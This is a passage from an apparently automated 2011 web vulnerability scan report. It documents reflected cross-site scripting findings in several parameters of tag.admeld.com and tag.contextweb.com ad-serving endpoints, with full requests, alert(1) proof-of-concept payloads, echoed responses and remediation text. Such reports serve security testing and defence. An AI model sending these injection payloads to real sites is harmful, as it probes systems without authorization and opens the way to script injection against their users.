QiOiIwLjAwIiwiYWQiOjQxMDM3MjAsICJidXkiOjUyMDksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRXFhZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo5MjI5NjAsICJidXkiOjQyNTIsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUaGUgVHJhZGUgRGVzayAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI4NTAwNzEsICJidXkiOjczNzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjM0NTU1LCAiYnV5IjoxOTYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzQ3MTQsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzM0In0=
Content-Length: 364
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:01 GMT
Connection: close
Set-Cookie: D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; expires=Thu, 19-May-2011 01:28:00 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GlamAdmeldRenderJsAdabcb9<script>alert(1)</script>3d8eb2f0e91({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":728,"height":90,"container":"ADMELD6529836193","bid":0.00,"requestId":"6a4a67cf-464d-40b9-8ede-61afbba16d7b","views":0,"expires":13
...[SNIP]...

3.457. http://tag.admeld.com/ad/json/100/glammedia/728x90/367631667 [container parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/728x90/367631667

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload 6bce9<script>alert(1)</script>11d949db645 was submitted in the container parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/728x90/367631667?01AD=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g&01RI=035843F03C56E88&01NA=&url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD65298361936bce9<script>alert(1)</script>11d949db645 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgLTEsICBuZXR3b3JrOiAgICAgICJhZG1lbGRwc2EiLCAgc2l6ZTogICAgICAgICAiNzI4eDkwIiwgIGZyZXE6ICAgICAgICAgIjAtMCIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiMWQwNzI0OGUtZTMyOC00YTY3LWE5ZDItZmY2NWViZTVkM2JlIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiMzY3NjMxNjY3IiwgIGRpdjogICAgICAgICAgIjFkMDcyNDhlLWUzMjgtNGE2Ny1hOWQyLWZmNjVlYmU1ZDNiZSIsICB1cmw6ICAgICAgICAgICJodHRwOi8vcG9wb250aGVwb3AuY29tLzIwMTEvMDQvbGluZHNheS1sb2hhbi1sb3Nlcy12aWN0b3JpYS1nb3R0aS1yb2xlLyIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJob3VzZSIsICBpbXA6ICAgICAgICAgIDY3LCAgbmV0d29ya19pZDogICAwLCAgYWNjb3VudF9pZDogICAwLCAgbmV0d29ya19uYW1lOiAiQWRNZWxkIFBTQSIsICBwdWJsaXNoZXJfbmFtZTogImdsYW0iLCAgZWNwbTogICAgICAgICAiMC43MCIsICBmZWNwbTogICAgICAgICIwLjcwIiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICIzNjc2MzE2NjciLCAgcnVsZTogICAgICAgICAiMzY3NjMxNjY3IiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ikx1Y2lkTWVkaWEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1MTQzOSwgImJ1eSI6MjAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFwcE5leHVzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6OTQ5MjQsICJidXkiOjExMywibHAiOiJodHRwOi8vd3d3LnNob2VidXkuY29tIiwiYW4iOiIiLCJzdGF0dXMiOiIwLjEzIE4iLCJmaWQiOjE3MiwgImZjcG0iOiIwLjcwIn0seyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjM0NDM3LCAiYnV5IjoxNzgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTMzNzY0LCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiSW52aXRlIE1lZGlhIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6OTk1MTIsICJidXkiOjUwNywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzAwMTQ0LCAiYnV5IjoxMjQ0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkNoYW5nbyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE3NTQ2MywgImJ1eSI6MTE3MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJTaW1wbGkuZmkgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNTQ1NjUsICJidXkiOjEwODQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiWEEubmV0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjYyMTU3LCAiYnV5IjoyMDM3LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkFjdWl0eSBBZHMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo0MTAzNzIwLCAiYnV5Ijo1MjA5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6OTIyOTYwLCAiYnV5Ijo0MjUyLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVGhlIFRyYWRlIERlc2sgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyODUwMDcxLCAiYnV5Ijo3MzcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozNDU1NSwgImJ1eSI6MTk2LCJscCI6Imh0dHBzOi8vdXMuYmF0dGxlLm5ldC9hY2NvdW50L2NyZWF0aW9uL3dvdy9zaWdudXAvO2pzZXNzaW9uaWQ9OTg0QTVEQTgyQkIxNTExRTJEMjY2RDY2RTJFRjMyQUYuYmxhZGUzNF8wMiIsImFuIjoiV29ybGQgb2YgV2FyY3JhZnQiLCJzdGF0dXMiOiIwLjA3IiwiZmlkIjoxNzIsICJmY3BtIjoiMC43MCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzQ3MTQsICJidXkiOjIwMCwibHAiOiJ3d3cuYW1lcmljYW5leHByZXNzLmNvbSIsImFuIjoiQW1lcmljYW4gRXhwcmVzcyIsInN0YXR1cyI6IjAuMDgiLCJmaWQiOjE3MiwgImZjcG0iOiIwLjcwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzExIn0=
Content-Length: 364
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:04 GMT
Connection: close
Set-Cookie: D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; expires=Thu, 19-May-2011 01:28:04 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GlamAdmeldRenderJsAd({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":728,"height":90,"container":"ADMELD65298361936bce9<script>alert(1)</script>11d949db645","bid":0.00,"requestId":"1d07248e-e328-4a67-a9d2-ff65ebe5d3be","views":0,"expires":1303349344,"creative":"<img src=\"http://tag.admeld.com/psa/adc_es_green_728x90.jpg\"/>
...[SNIP]...

3.458. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5496"%3balert(1)//914834f4ab8 was submitted in the action parameter. This input was echoed as e5496";alert(1)//914834f4ab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWADe5496"%3balert(1)//914834f4ab8&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 21 Apr 2011 01:27:54 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWADe5496";alert(1)//914834f4ab8";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var
...[SNIP]...

3.459. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb321"%3balert(1)//5d5ca387a74 was submitted in the cwadformat parameter. This input was echoed as fb321";alert(1)//5d5ca387a74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90fb321"%3balert(1)//5d5ca387a74&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:01 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:01 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90fb321";alert(1)//5d5ca387a74";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...

3.460. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c563"%3balert(1)//237f60e5c6d was submitted in the cwheight parameter. This input was echoed as 3c563";alert(1)//237f60e5c6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=903c563"%3balert(1)//237f60e5c6d&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="903c563";alert(1)//237f60e5c6d";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

3.461. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a66cb"%3balert(1)//a2d3d91b255 was submitted in the cwpid parameter. This input was echoed as a66cb";alert(1)//a2d3d91b255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997a66cb"%3balert(1)//a2d3d91b255&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB30
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997a66cb";alert(1)//a2d3d91b255";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

3.462. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28960"%3balert(1)//e883c538ed5 was submitted in the cwpnet parameter. This input was echoed as 28960";alert(1)//e883c538ed5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?01AD=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ&01RI=9FD2A2D39A1CA44&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=128960"%3balert(1)//e883c538ed5&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
Date: Thu, 21 Apr 2011 01:28:02 GMT
Connection: close
Set-Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; expires=Thu, 19-May-2011 01:28:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="128960";alert(1)//e883c538ed5";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

3.463. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe6bb"%3balert(1)//3471d1d5975 was submitted in the cwrun parameter. This input was echoed as fe6bb";alert(1)//3471d1d5975 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200fe6bb"%3balert(1)//3471d1d5975&cwadformat=728X90&cwpid=529997&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=88377 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=wOebwAz4UvVv

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Thu, 07 Apr 2011 16:03:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5734
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 21 Apr 2011 01:27:55 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="529997";var ct="88377";var cf="728X90";var ca="VIEWAD";var cr="200fe6bb";alert(1)//3471d1d5975";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;
...[SNIP]...

3.464. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx
